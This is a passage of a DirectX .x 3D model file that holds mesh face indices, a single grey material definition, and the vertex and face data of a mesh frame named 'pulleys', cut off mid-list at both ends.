4;356,357,418,419;, 4;357,356,359,358;, 4;363,360,357,358;, 4;360,375,418,357;, 4;352,353,414,415;, 4;353,352,355,354;, 4;138,139,354,355;, 4;137,136,139,138;, 4;292,293,136,137;, 4;293,292,295,294;, 4;294,295,140,141;, 4;141,140,143,142;, 4;42,43,142,143;, 4;41,40,43,42;, 4;232,233,40,41;, 4;49,40,233,236;, 4;49,50,43,40;, 4;142,43,50,151;, 4;151,148,141,142;, 4;299,294,141,148;, 4;299,296,293,294;, 4;145,136,293,296;, 4;296,297,144,145;, 4;297,296,299,298;, 4;298,299,148,149;, 4;149,148,151,150;, 4;50,51,150,151;, 4;49,48,51,50;, 4;236,237,48,49;, 4;57,48,237,240;, 4;57,58,51,48;, 4;150,51,58,159;, 4;159,156,149,150;, 4;303,298,149,156;, 4;303,300,297,298;, 4;301,300,303,302;, 4;307,304,301,302;, 4;305,304,307,306;, 4;306,307,164,165;, 4;307,302,157,164;, 4;302,303,156,157;, 4;157,156,159,158;, 4;167,164,157,158;, 4;165,164,167,166;, 4;66,67,166,167;, 4;158,59,66,167;, 4;58,59,158,159;, 4;57,56,59,58;, 4;65,66,59,56;, 4;65,64,67,66;, 4;244,245,64,65;, 4;65,56,241,244;, 4;240,241,56,57;, 4;73,74,67,64;, 4;73,64,245,248;, 4;248,249,72,73;, 4;73,72,75,74;, 4;74,75,174,175;, 4;173,172,175,174;, 4;310,311,172,173;, 4;309,308,311,310;, 4;308,309,168,169;, 4;169,160,305,308;, 4;304,305,160,161;, 4;161,152,301,304;, 4;300,301,152,153;, 4;153,144,297,300;, 4;153,154,147,144;, 4;153,152,155,154;, 4;161,162,155,152;, 4;161,160,163,162;, 4;169,170,163,160;, 4;169,168,171,170;, 4;185,186,171,168;, 4;185,168,309,312;, 4;315,312,309,310;, 4;315,310,173,188;, 4;191,188,173,174;, 4;174,75,90,191;, 4;89,90,75,72;, 4;89,72,249,252;, 4;252,253,88,89;, 4;89,88,91,90;, 4;90,91,190,191;, 4;189,188,191,190;, 4;314,315,188,189;, 4;313,312,315,314;, 4;312,313,184,185;, 4;185,184,187,186;, 4;186,187,326,327;, 4;325,324,327,326;, 4;324,325,386,387;, 4;324,387,382,369;, 4;327,324,369,370;, 4;370,171,186,327;, 4;311,308,305,306;, 4;311,306,165,172;, 4;175,172,165,166;, 4;166,67,74,175;, 4;190,91,86,179;, 4;179,176,189,190;, 4;319,314,189,176;, 4;319,316,313,314;, 4;181,184,313,316;, 4;181,182,187,184;, 4;326,187,182,331;, 4;331,328,325,326;, 4;328,391,386,325;, 4;328,329,390,391;, 4;329,328,331,330;, 4;182,183,330,331;, 4;181,180,183,182;, 4;316,317,180,181;, 4;317,316,319,318;, 4;318,319,176,177;, 4;177,176,179,178;, 4;86,87,178,179;, 4;85,84,87,86;, 4;256,257,84,85;, 4;1,84,257,260;, 4;1,2,87,84;, 4;178,87,2,103;, 4;103,100,177,178;, 4;323,318,177,100;, 4;323,320,317,318;, 4;97,180,317,320;, 4;97,98,183,180;, 4;330,183,98,335;, 4;335,332,329,330;, 4;332,395,390,329;, 4;332,333,394,395;, 4;333,332,335,334;, 4;339,336,333,334;, 4;337,336,339,338;, 4;343,340,337,338;, 4;341,340,343,342;, 4;347,344,341,342;, 4;344,407,402,341;, 4;340,341,402,403;, 4;340,403,398,337;, 4;336,337,398,399;, 4;336,399,394,333;, 4;106,107,338,339;, 4;338,107,114,343;, 4;114,115,342,343;, 4;342,115,122,347;, 4;121,122,115,112;, 4;121,112,281,284;, 4;287,284,281,282;, 4;287,282,117,124;, 4;127,124,117,118;, 4;118,19,26,127;, 4;25,26,19,16;, 4;25,16,269,272;, 4;268,269,16,17;, 4;17,16,19,18;, 4;18,19,118,119;, 4;117,116,119,118;, 4;282,283,116,117;, 4;281,280,283,282;, 4;280,281,112,113;, 4;113,112,115,114;, 4;113,114,107,104;, 4;113,104,277,280;, 4;283,280,277,278;, 4;283,278,109,116;, 4;119,116,109,110;, 4;110,11,18,119;, 4;17,18,11,8;, 4;17,8,265,268;, 4;264,265,8,9;, 4;9,8,11,10;, 4;10,11,110,111;, 4;109,108,111,110;, 4;278,279,108,109;, 4;277,276,279,278;, 4;276,277,104,105;, 4;105,104,107,106;, 4;105,106,99,96;, 4;105,96,321,276;, 4;279,276,321,322;, 4;279,322,101,108;, 4;111,108,101,102;, 4;102,3,10,111;, 4;9,10,3,0;, 4;9,0,261,264;, 4;260,261,0,1;, 4;1,0,3,2;, 4;2,3,102,103;, 4;101,100,103,102;, 4;322,323,100,101;, 4;321,320,323,322;, 4;320,321,96,97;, 4;97,96,99,98;, 4;98,99,334,335;, 4;334,99,106,339;, 4;121,120,123,122;, 4;284,285,120,121;, 4;285,284,287,286;, 4;286,287,124,125;, 4;125,124,127,126;, 4;26,27,126,127;, 4;25,24,27,26;, 4;272,273,24,25;, 4;33,24,273,228;, 4;33,34,27,24;, 4;126,27,34,135;, 4;135,132,125,126;, 4;291,286,125,132;, 4;291,288,285,286;, 4;129,120,285,288;, 4;129,130,123,120;, 4;346,123,130,351;, 4;351,348,345,346;, 4;348,411,406,345;, 4;344,345,406,407;, 4;345,344,347,346;, 4;122,123,346,347;, 4;129,128,131,130;, 4;130,131,350,351;, 4;349,348,351,350;, 4;348,349,410,411;, 4;352,415,410,349;, 4;355,352,349,350;, 4;350,131,138,355;, 4;137,138,131,128;, 4;137,128,289,292;, 4;295,292,289,290;, 4;295,290,133,140;, 4;143,140,133,134;, 4;134,35,42,143;, 4;41,42,35,32;, 4;41,32,229,232;, 4;228,229,32,33;, 4;33,32,35,34;, 4;34,35,134,135;, 4;133,132,135,134;, 4;290,291,132,133;, 4;289,288,291,290;, 4;288,289,128,129;, 4;145,146,139,136;, 4;145,144,147,146;, 4;85,86,91,88;, 4;85,88,253,256;, 4;377,376,379,378;, 4;379,376,373,374;, 4;373,372,375,374;, 4;375,372,417,418;, 4;417,416,419,418;, 4;419,416,413,414;, 4;416,431,426,413;, 4;416,417,430,431;, 4;372,435,430,417;, 4;372,373,434,435;, 4;376,439,434,373;, 4;376,377,438,439;, 4;380,443,438,377;, 4;380,381,442,443;, 4;384,447,442,381;, 4;387,384,381,382;, 4;381,380,383,382;, 4;383,380,377,378;, 4;385,384,387,386;, 4;384,385,446,447;, 4;445,444,447,446;, 4;447,444,441,442;, 4;441,440,443,442;, 4;443,440,437,438;, 4;437,436,439,438;, 4;439,436,433,434;, 4;433,432,435,434;, 4;435,432,429,430;, 4;429,428,431,430;, 4;431,428,425,426;, 4;425,424,427,426;, 4;412,413,426,427;, 4;413,412,415,414;, 4;415,412,409,410;, 4;412,427,422,409;, 4;427,424,421,422;, 4;421,420,423,422;, 4;408,409,422,423;, 4;409,408,411,410;, 4;411,408,405,406;, 4;408,423,466,405;, 4;404,405,466,467;, 4;404,467,462,401;, 4;400,401,462,463;, 4;400,463,458,397;, 4;396,397,458,459;, 4;396,459,454,393;, 4;392,393,454,455;, 4;392,455,450,389;, 4;455,452,449,450;, 4;453,452,455,454;, 4;459,456,453,454;, 4;457,456,459,458;, 4;463,460,457,458;, 4;461,460,463,462;, 4;467,464,461,462;, 4;465,464,467,466;, 4;423,420,465,466;, 4;449,448,451,450;, 4;388,389,450,451;, 4;389,388,391,390;, 4;395,392,389,390;, 4;393,392,395,394;, 4;399,396,393,394;, 4;397,396,399,398;, 4;403,400,397,398;, 4;401,400,403,402;, 4;407,404,401,402;, 4;405,404,407,406;, 4;451,448,445,446;, 4;388,451,446,385;, 4;391,388,385,386;, 4;436,437,493,494;, 4;436,494,491,433;, 4;432,433,491,492;, 4;432,492,489,429;, 4;428,429,489,490;, 4;428,490,486,425;, 4;490,488,485,486;, 4;485,484,487,486;, 4;424,425,486,487;, 4;424,487,482,421;, 4;487,484,481,482;, 4;481,480,483,482;, 4;420,421,482,483;, 4;420,483,478,465;, 4;483,480,477,478;, 4;477,476,479,478;, 4;464,465,478,479;, 4;464,479,474,461;, 4;479,476,473,474;, 4;473,472,475,474;, 4;475,472,469,470;, 4;469,468,471,470;, 4;456,457,470,471;, 4;460,475,470,457;, 4;460,461,474,475;, 4;456,471,509,453;, 4;471,468,508,509;, 4;508,507,510,509;, 4;452,453,509,510;, 4;452,510,505,449;, 4;510,507,504,505;, 4;504,503,506,505;, 4;448,449,505,506;, 4;448,506,501,445;, 4;506,503,500,501;, 4;500,499,502,501;, 4;444,445,501,502;, 4;444,502,497,441;, 4;502,499,496,497;, 4;496,495,498,497;, 4;440,441,497,498;, 4;440,498,493,437;, 4;245,244,247,246;, 4;247,244,241,242;, 4;241,240,243,242;, 4;243,240,237,238;, 4;237,236,239,238;, 4;239,236,233,234;, 4;233,232,235,234;, 4;235,232,229,230;, 4;229,228,231,230;, 4;231,228,273,274;, 4;273,272,275,274;, 4;275,272,269,270;, 4;269,268,271,270;, 4;271,268,265,266;, 4;265,264,267,266;, 4;267,264,261,262;, 4;261,260,263,262;, 4;263,260,257,258;, 4;257,256,259,258;, 4;259,256,253,254;, 4;253,252,255,254;, 4;255,252,249,250;, 4;249,248,251,250;, 4;251,248,245,246;, 4;246,247,68,69;, 4;247,242,61,68;, 4;242,243,60,61;, 4;243,238,53,60;, 4;63,60,53,54;, 4;61,60,63,62;, 4;71,68,61,62;, 4;69,68,71,70;, 4;79,76,69,70;, 4;77,76,79,78;, 4;250,251,76,77;, 4;251,246,69,76;, 4;198,79,70,196;, 4;195,196,70,71;, 4;195,71,62,193;, 4;192,193,62,63;, 4;192,63,54,226;, 4;225,226,54,55;, 4;225,55,46,223;, 4;55,52,45,46;, 4;239,234,45,52;, 4;238,239,52,53;, 4;53,52,55,54;, 4;234,235,44,45;, 4;45,44,47,46;, 4;222,223,46,47;, 3;223,222,224;, 4;227,225,223,224;, 3;226,225,227;, 4;194,192,226,227;, 3;193,192,194;, 4;197,195,193,194;, 3;196,195,197;, 4;200,198,196,197;, 3;199,198,200;, 4;203,201,199,200;, 3;202,201,203;, 4;201,202,94,95;, 4;93,92,95,94;, 4;254,255,92,93;, 4;255,250,77,92;, 4;95,92,77,78;, 4;201,95,78,199;, 4;198,199,78,79;, 4;204,83,94,202;, 4;83,80,93,94;, 4;259,254,93,80;, 4;258,259,80,81;, 4;81,80,83,82;, 4;204,205,82,83;, 3;205,204,206;, 4;209,207,205,206;, 3;208,207,209;, 4;212,210,208,209;, 3;211,210,212;, 4;215,213,211,212;, 3;214,213,215;, 4;218,216,214,215;, 3;217,216,218;, 4;221,219,217,218;, 3;220,219,221;, 4;219,220,38,39;, 4;37,36,39,38;, 4;230,231,36,37;, 4;231,274,29,36;, 4;39,36,29,30;, 4;219,39,30,217;, 4;216,217,30,31;, 4;216,31,22,214;, 4;213,214,22,23;, 4;213,23,14,211;, 4;210,211,14,15;, 4;210,15,6,208;, 4;207,208,6,7;, 4;207,7,82,205;, 4;7,4,81,82;, 4;263,258,81,4;, 4;262,263,4,5;, 4;5,4,7,6;, 4;15,12,5,6;, 4;13,12,15,14;, 4;23,20,13,14;, 4;21,20,23,22;, 4;31,28,21,22;, 4;29,28,31,30;, 4;274,275,28,29;, 4;275,270,21,28;, 4;270,271,20,21;, 4;271,266,13,20;, 4;266,267,12,13;, 4;267,262,5,12;, 4;206,204,202,203;, 12;200,197,194,227,224,221,218,215,212,209,206,203;, 4;224,222,220,221;, 4;222,47,38,220;, 4;47,44,37,38;, 4;235,230,37,44;; MeshMaterialList { 1; 499; 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;; Material { 0.498039;0.498039;0.498039;1.0;; 60.0; 0.000000;0.000000;0.000000;; 0.000000;0.000000;0.000000;; } # Material } # MeshMaterialList } # Mesh } # Frame _advance Frame _pulleys { FrameTransformMatrix { 1.000000, 0.000000, 0.000000, 0.000000, 0.000000, 1.000000, 0.000000, 0.000000, 0.000000, 0.000000, 1.000000, 0.000000, 0.000000, 0.000000, 0.000000, 1.000000;; } #FrameTransformMatrix Mesh pulleys { 350; -0.440897;0.319341;-1.669483;, -0.487525;0.325197;-1.669480;, -0.534155;0.319341;-1.669475;, -0.573505;0.304486;-1.669472;, -0.607978;0.281921;-1.669470;, -0.637372;0.251929;-1.669467;, -0.659485;0.216752;-1.669466;, -0.674043;0.176599;-1.669465;, -0.679782;0.129018;-1.669465;, -0.674043;0.081438;-1.669465;, -0.659485;0.041283;-1.669466;, -0.637372;0.006107;-1.669467;, -0.607978;-0.023885;-1.669470;, -0.573505;-0.046450;-1.669472;, -0.534155;-0.061303;-1.669475;, -0.487525;-0.067162;-1.669480;, -0.440897;-0.061303;-1.669483;, -0.401546;-0.046450;-1.669485;, -0.367074;-0.023885;-1.669488;, -0.337681;0.006107;-1.669492;, -0.315567;0.041283;-1.669492;, -0.301012;0.081438;-1.669494;, -0.295270;0.129018;-1.669494;, -0.301012;0.176599;-1.669494;, -0.315567;0.216752;-1.669492;, -0.337681;0.251929;-1.669492;, -0.367074;0.281921;-1.669488;, -0.401546;0.304486;-1.669485;, -0.357979;0.235279;-1.658454;, -0.383389;0.261207;-1.658452;, -0.413192;0.280717;-1.658450;, -0.447213;0.293559;-1.658449;, -0.487525;0.298623;-1.658445;, -0.527838;0.293559;-1.658441;, -0.561857;0.280717;-1.658438;, -0.591661;0.261207;-1.658437;, -0.617073;0.235279;-1.658435;, -0.636191;0.204867;-1.658433;, -0.648774;0.170154;-1.658432;, -0.653738;0.129018;-1.658431;, -0.648774;0.087884;-1.658432;, -0.636191;0.053169;-1.658433;, -0.617073;0.022758;-1.658435;, -0.591661;-0.003172;-1.658437;, -0.561857;-0.022680;-1.658438;, -0.527838;-0.035522;-1.658441;, -0.487525;-0.040585;-1.658445;, -0.447213;-0.035522;-1.658449;, -0.413192;-0.022681;-1.658450;, -0.383389;-0.003172;-1.658452;, -0.357979;0.022758;-1.658454;, -0.338861;0.053169;-1.658456;, -0.326276;0.087884;-1.658458;, -0.321312;0.129018;-1.658458;, -0.326276;0.170154;-1.658458;, -0.338861;0.204867;-1.658456;, -0.321312;0.129018;-1.652736;, -0.326276;0.170154;-1.652736;, -0.338861;0.204867;-1.652734;, -0.357979;0.235279;-1.652732;, -0.383389;0.261207;-1.652729;, -0.413191;0.280717;-1.652728;, -0.447213;0.293559;-1.652725;, -0.487525;0.298623;-1.652723;, -0.527838;0.293559;-1.652719;, -0.561857;0.280717;-1.652716;, -0.591661;0.261207;-1.652714;, -0.617071;0.235279;-1.652712;, -0.636191;0.204867;-1.652710;, -0.648774;0.170154;-1.652710;, -0.653738;0.129018;-1.652709;, -0.648774;0.087884;-1.652710;, -0.636191;0.053169;-1.652710;, -0.617071;0.022758;-1.652712;, -0.591661;-0.003172;-1.652714;, -0.561857;-0.022680;-1.652716;, -0.527838;-0.035522;-1.652719;, -0.487525;-0.040585;-1.652723;, -0.447213;-0.035522;-1.652725;, -0.413191;-0.022681;-1.652728;, -0.383389;-0.003172;-1.652729;, -0.357979;0.022758;-1.652732;, -0.338861;0.053169;-1.652734;, -0.326276;0.087884;-1.652736;, -0.337053;0.005594;-1.641570;, -0.314849;0.040919;-1.641571;, -0.300231;0.081239;-1.641572;, -0.294467;0.129018;-1.641572;, -0.300231;0.176796;-1.641572;, -0.314849;0.217118;-1.641571;, -0.337053;0.252441;-1.641570;, -0.366570;0.282558;-1.641567;, -0.401186;0.305218;-1.641564;, -0.440701;0.320133;-1.641560;, -0.487524;0.326015;-1.641558;, -0.534348;0.320133;-1.641554;, -0.573864;0.305218;-1.641550;, -0.608479;0.282558;-1.641548;, -0.637993;0.252441;-1.641546;, -0.660199;0.217118;-1.641544;, -0.674818;0.176796;-1.641542;, -0.680582;0.129018;-1.641542;, -0.674818;0.081239;-1.641542;, -0.660199;0.040919;-1.641544;, -0.637993;0.005594;-1.641546;, -0.608479;-0.024522;-1.641548;, -0.573864;-0.047181;-1.641550;, -0.534348;-0.062098;-1.641554;, -0.487524;-0.067979;-1.641558;, -0.440701;-0.062098;-1.641560;, -0.401186;-0.047181;-1.641564;, -0.366570;-0.024522;-1.641567;, -0.440701;-0.062098;-1.634673;, -0.401186;-0.047181;-1.634677;, -0.366569;-0.024522;-1.634679;, -0.337052;0.005594;-1.634681;, -0.314847;0.040919;-1.634683;, -0.300231;0.081239;-1.634684;, -0.294466;0.129018;-1.634684;, -0.300231;0.176796;-1.634684;, -0.314847;0.217118;-1.634683;, -0.337052;0.252441;-1.634681;, -0.366569;0.282558;-1.634679;, -0.401186;0.305218;-1.634677;, -0.440701;0.320133;-1.634673;, -0.487523;0.326015;-1.634669;, -0.534347;0.320133;-1.634665;, -0.573862;0.305218;-1.634663;, -0.608479;0.282558;-1.634660;, -0.637992;0.252441;-1.634657;, -0.660199;0.217118;-1.634655;, -0.674818;0.176796;-1.634654;, -0.680582;0.129018;-1.634653;, -0.674818;0.081239;-1.634654;, -0.660199;0.040919;-1.634655;, -0.637992;0.005594;-1.634657;, -0.608479;-0.024522;-1.634660;, -0.573862;-0.047181;-1.634663;, -0.534347;-0.062098;-1.634665;, -0.487523;-0.067979;-1.634669;, -0.561855;-0.022680;-1.622463;, -0.527834;-0.035522;-1.622465;, -0.487523;-0.040585;-1.622469;, -0.447209;-0.035522;-1.622473;, -0.413190;-0.022681;-1.622475;, -0.383387;-0.003172;-1.622477;, -0.357975;0.022758;-1.622479;, -0.338857;0.053169;-1.622480;, -0.326272;0.087884;-1.622482;, -0.321309;0.129018;-1.622482;, -0.326272;0.170154;-1.622482;, -0.338857;0.204867;-1.622480;, -0.357975;0.235279;-1.622479;, -0.383387;0.261207;-1.622477;, -0.413190;0.280717;-1.622475;, -0.447209;0.293559;-1.622473;, -0.487523;0.298623;-1.622469;, -0.527834;0.293559;-1.622465;, -0.561855;0.280717;-1.622463;, -0.591659;0.261207;-1.622461;, -0.617068;0.235279;-1.622459;, -0.636188;0.204867;-1.622457;, -0.648770;0.170154;-1.622457;, -0.653735;0.129018;-1.622454;, -0.648770;0.087884;-1.622457;, -0.636188;0.053169;-1.622457;, -0.617068;0.022758;-1.622459;, -0.591659;-0.003172;-1.622461;, -0.636188;0.053169;-1.616734;, -0.617068;0.022758;-1.616735;, -0.591659;-0.003172;-1.616737;, -0.561855;-0.022680;-1.616741;, -0.527834;-0.035522;-1.616742;, -0.487523;-0.040585;-1.616746;, -0.447209;-0.035522;-1.616748;, -0.413190;-0.022681;-1.616751;, -0.383387;-0.003172;-1.616755;, -0.357975;0.022758;-1.616757;, -0.338857;0.053169;-1.616757;, -0.326272;0.087884;-1.616758;, -0.321309;0.129018;-1.616758;, -0.326272;0.170154;-1.616758;, -0.338857;0.204867;-1.616757;, -0.357975;0.235279;-1.616757;, -0.383387;0.261207;-1.616755;, -0.413190;0.280717;-1.616751;, -0.447209;0.293559;-1.616748;, -0.487523;0.298623;-1.616746;, -0.527834;0.293559;-1.616742;, -0.561855;0.280717;-1.616741;, -0.591659;0.261207;-1.616737;, -0.617068;0.235279;-1.616735;, -0.636188;0.204867;-1.616734;, -0.648770;0.170154;-1.616732;, -0.653734;0.129018;-1.616732;, -0.648770;0.087884;-1.616732;, -0.676378;0.177195;-1.606085;, -0.682191;0.129018;-1.606084;, -0.676378;0.080840;-1.606085;, -0.661639;0.040182;-1.606086;, -0.639247;0.004565;-1.606088;, -0.609487;-0.025805;-1.606090;, -0.574579;-0.048653;-1.606094;, -0.534736;-0.063693;-1.606096;, -0.487523;-0.069623;-1.606100;, -0.440306;-0.063693;-1.606103;, -0.400462;-0.048653;-1.606107;, -0.365556;-0.025805;-1.606110;, -0.335795;0.004565;-1.606111;, -0.313404;0.040182;-1.606114;, -0.298664;0.080840;-1.606115;, -0.292851;0.129018;-1.606115;, -0.298664;0.177195;-1.606115;, -0.313404;0.217853;-1.606114;, -0.335795;0.253473;-1.606111;, -0.365556;0.283840;-1.606110;, -0.400462;0.306690;-1.606107;, -0.440306;0.321729;-1.606103;, -0.487523;0.327661;-1.606100;, -0.534736;0.321729;-1.606096;, -0.574579;0.306689;-1.606094;, -0.609487;0.283840;-1.606090;, -0.639247;0.253473;-1.606088;, -0.661639;0.217853;-1.606086;, -1.163969;-0.140828;-1.619202;, -1.119414;-0.132811;-1.619205;, -1.080234;-0.109729;-1.619207;, -1.051153;-0.074363;-1.619210;, -1.035679;-0.030983;-1.619211;, -1.035679;0.015182;-1.619211;, -1.051153;0.058564;-1.619210;, -1.080234;0.093928;-1.619207;, -1.119414;0.117011;-1.619205;, -1.163969;0.125027;-1.619202;, -1.208524;0.117011;-1.619200;, -1.247705;0.093928;-1.619197;, -1.276785;0.058564;-1.619196;, -1.292259;0.015182;-1.619194;, -1.292259;-0.030983;-1.619194;, -1.276785;-0.074363;-1.619196;, -1.247705;-0.109729;-1.619197;, -1.208524;-0.132811;-1.619200;, -1.135181;-0.088614;-1.627545;, -1.163970;-0.093795;-1.627544;, -1.192761;-0.088614;-1.627542;, -1.218078;-0.073699;-1.627540;, -1.236870;-0.050847;-1.627538;, -1.246867;-0.022815;-1.627537;, -1.246867;0.007016;-1.627537;, -1.236870;0.035048;-1.627538;, -1.218078;0.057900;-1.627540;, -1.192761;0.072816;-1.627542;, -1.163970;0.077995;-1.627544;, -1.135181;0.072816;-1.627545;, -1.109863;0.057900;-1.627547;, -1.091072;0.035048;-1.627548;, -1.081073;0.007016;-1.627548;, -1.081073;-0.022815;-1.627548;, -1.091072;-0.050847;-1.627548;, -1.109863;-0.073699;-1.627547;, -1.081077;-0.022815;-1.672184;, -1.091076;-0.050847;-1.672184;, -1.109866;-0.073699;-1.672182;, -1.135185;-0.088614;-1.672181;, -1.163973;-0.093795;-1.672180;, -1.192765;-0.088614;-1.672178;, -1.218081;-0.073699;-1.672176;, -1.236874;-0.050847;-1.672173;, -1.246871;-0.022815;-1.672173;, -1.246871;0.007016;-1.672173;, -1.236874;0.035048;-1.672173;, -1.218081;0.057900;-1.672176;, -1.192765;0.072816;-1.672178;, -1.163973;0.077995;-1.672180;, -1.135185;0.072816;-1.672181;, -1.109866;0.057900;-1.672182;, -1.091076;0.035048;-1.672184;, -1.081077;0.007016;-1.672184;, -1.078481;0.096068;-1.681074;, -1.048790;0.059960;-1.681076;, -1.032990;0.015668;-1.681079;, -1.032990;-0.031467;-1.681079;, -1.048790;-0.075759;-1.681076;, -1.078481;-0.111869;-1.681074;, -1.118484;-0.135435;-1.681072;, -1.163976;-0.143620;-1.681069;, -1.209467;-0.135435;-1.681068;, -1.249470;-0.111869;-1.681065;, -1.279162;-0.075759;-1.681063;, -1.294961;-0.031467;-1.681060;, -1.294961;0.015668;-1.681060;, -1.279162;0.059960;-1.681063;, -1.249470;0.096068;-1.681065;, -1.209467;0.119636;-1.681068;, -1.163976;0.127821;-1.681069;, -1.118484;0.119636;-1.681072;, -1.209467;0.119636;-1.691058;, -1.163976;0.127821;-1.691059;, -1.118486;0.119636;-1.691063;, -1.078481;0.096068;-1.691065;, -1.048791;0.059960;-1.691068;, -1.032991;0.015668;-1.691068;, -1.032991;-0.031467;-1.691068;, -1.048791;-0.075759;-1.691068;, -1.078481;-0.111869;-1.691065;, -1.118486;-0.135435;-1.691063;, -1.163976;-0.143620;-1.691059;, -1.209467;-0.135435;-1.691058;, -1.249471;-0.111869;-1.691055;, -1.279164;-0.075759;-1.691053;, -1.294961;-0.031467;-1.691052;, -1.294961;0.015668;-1.691052;, -1.279164;0.059960;-1.691053;, -1.249471;0.096068;-1.691055;, -1.233638;0.004634;-1.691055;, -1.225237;0.028190;-1.691057;, -1.209445;0.047393;-1.691058;, -1.188170;0.059928;-1.691059;, -1.163976;0.064281;-1.691059;, -1.139783;0.059928;-1.691061;, -1.118508;0.047393;-1.691063;, -1.102717;0.028190;-1.691064;, -1.094315;0.004634;-1.691064;, -1.094315;-0.020433;-1.691064;, -1.102717;-0.043989;-1.691064;, -1.118508;-0.063193;-1.691063;, -1.139783;-0.075727;-1.691061;, -1.163976;-0.080080;-1.691059;, -1.188170;-0.075727;-1.691059;, -1.209445;-0.063193;-1.691058;, -1.225237;-0.043989;-1.691057;, -1.233638;-0.020433;-1.691055;, -1.209443;-0.063193;-1.683449;, -1.225234;-0.043989;-1.683449;, -1.233636;-0.020433;-1.683447;, -1.233636;0.004634;-1.683447;, -1.225234;0.028190;-1.683449;, -1.209443;0.047393;-1.683449;, -1.188168;0.059928;-1.683451;, -1.163976;0.064281;-1.683453;, -1.139781;0.059928;-1.683454;, -1.118506;0.047393;-1.683455;, -1.102715;0.028190;-1.683456;, -1.094313;0.004634;-1.683456;, -1.094313;-0.020433;-1.683456;, -1.102715;-0.043989;-1.683456;, -1.118506;-0.063193;-1.683455;, -1.139781;-0.075727;-1.683454;, -1.163976;-0.080080;-1.683453;, -1.188168;-0.075727;-1.683451;; 307; 28;221,222,223,196,197,198,199,200,201,202,203,204,205,206,207,208,209,210,211,212,213,214,215,216,217,218,219,220;, 28;23,22,21,20,19,18,17,16,15,14,13,12,11,10,9,8,7,6,5,4,3,2,1,0,27,26,25,24;, 18;347,348,349,332,333,334,335,336,337,338,339,340,341,342,343,344,345,346;, 4;217,186,187,218;, 4;218,187,188,219;, 4;219,188,189,220;, 4;220,189,190,221;, 4;221,190,191,222;, 4;222,191,192,223;, 4;223,192,193,196;, 4;196,193,194,197;, 4;197,194,195,198;, 4;198,195,168,199;, 4;199,168,169,200;, 4;200,169,170,201;, 4;201,170,171,202;, 4;202,171,172,203;, 4;203,172,173,204;, 4;204,173,174,205;, 4;205,174,175,206;, 4;206,175,176,207;, 4;207,176,177,208;, 4;208,177,178,209;, 4;209,178,179,210;, 4;210,179,180,211;, 4;211,180,181,212;, 4;212,181,182,213;, 4;213,182,183,214;, 4;214,183,184,215;, 4;215,184,185,216;, 4;216,185,186,217;, 4;186,155,156,187;, 4;187,156,157,188;, 4;188,157,158,189;, 4;189,158,159,190;, 4;190,159,160,191;, 4;191,160,161,192;, 4;192,161,162,193;, 4;193,162,163,194;, 